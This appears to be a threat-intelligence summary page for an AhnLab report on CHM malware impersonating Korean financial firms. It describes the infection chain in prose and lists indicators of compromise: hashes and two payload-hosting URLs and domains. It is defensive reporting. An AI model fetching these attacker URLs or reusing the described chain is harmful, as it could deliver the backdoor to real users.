Shares tag: CHM • Shares 9 IOCs • Same author: Ahnlab • Published within a week
CHM 악성코드 유포 변화 탐지
2023-08-02 • Ahnlab • Detection of changes in CHM malware distribution •
ASEC described weekly changes in CHM malware distributed with lures impersonating South Korean financial companies and insurers. Earlier variants launched hh.exe, decompiled embedded HTML, created a .jse script, and used wscript plus PowerShell to download and execute additional code while maintaining Run-key persistence. A later variant changed behavior depending on whether AhnLab software was installed, while a second variant directly dropped and executed a .NET backdoor intended for reverse-connection access rather than only information theft. The report provides EDR detection names, malware classifications, hashes, and atusay.lat/zienk.sbs URLs for defenders tracking the evolving CHM execution chains.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | https://atusay.lat/kxydo | 2023-07-20 | 2023-08-30 |
| DOMAIN | atusay.lat | 2023-07-20 | 2023-08-30 |
| HASH | 790c5f50942a502252a00b9878db9496 | 2023-08-02 | 2023-08-09 |
| HASH | 8d39335e67e797ad66c3953c3d6203ce | 2023-08-02 | 2023-08-09 |
| HASH | 7c949f375c56e7de7a3c4f0a9a19c4e5 | 2023-08-02 | 2023-08-09 |
| HASH | 258472c79fc3b9360ad560e26350b756 | 2023-08-02 | 2023-08-09 |
| HASH | 056932151e3cc526ebf4ef5cf86ae0b4 | 2023-08-02 | 2023-08-09 |
| URL | https://zienk.sbs/kjntf | 2023-08-02 | 2023-08-09 |
| DOMAIN | zienk.sbs | 2023-08-02 | 2023-08-09 |
Related Reports
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a week
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a week
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a month
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a month
Shares tag: CHM • Same author: Ahnlab